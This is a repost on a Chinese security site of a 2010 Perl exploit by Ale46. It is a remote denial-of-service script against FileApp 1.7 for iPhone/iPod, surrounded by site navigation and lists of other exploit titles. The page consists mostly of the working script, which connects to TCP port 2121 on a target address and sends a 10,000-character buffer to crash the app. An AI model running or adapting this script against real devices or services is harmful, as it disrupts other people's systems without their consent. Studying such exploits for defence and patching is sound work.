首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FileApp v1.7 for iPhone/iPod Remote DoS Exploit
来源:vfocus.net 作者:Ale46 发布时间:2010-02-22  

#!/usr/bin/perl
#
# Exploit: FileApp - Remote Dos Exploit
# Date: 17/02/10
# Author: Ale46
# Software Link: http://www.digidna.net/products/fileapp
# Version: 1.7
# Tested on: Iphone 3GS with 3.1.2 firmware
#Go in the sharing section of FileApp and run this script, the
application crash and your Iphone\Ipod returns to the SpringBoard

use IO::Socket;

if (@ARGV<1){
        print ("Usage: ./fileapp <server_ip>\n");
        exit();
    }

my $host = $ARGV[0];
my $port = 2121;
my $stuff = "A"*10000;
my $socket = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => $port);
unless ($socket) { die "Can\'t connect to $host" }
print "Sending evil buffer..\n";
sleep(2);
print $socket $stuff;
sleep(1);
print "Now your app is.. Dosed :D";


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·gitWeb v1.5.2 Remote Command E
·Easy~Ftp Server v1.7.0.2 (HTTP
·Rising Online Virus Scanner v2
·Coppermine Photo Gallery <= 1.
·iTunes 9.0.1 .pls file handlin
·OtsTurntables Free v1.00.047 (
·Apple Iphone/Ipod - FTP On The
·Easy~Ftp Server v1.7.0.2 Post-
·Adobe Products XML External En
·Easy~Ftp Server v1.7.0.2 Post-
·Symantec Antivirus 10.0 Active
·Easy~Ftp Server v1.7.0.2 Post-
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved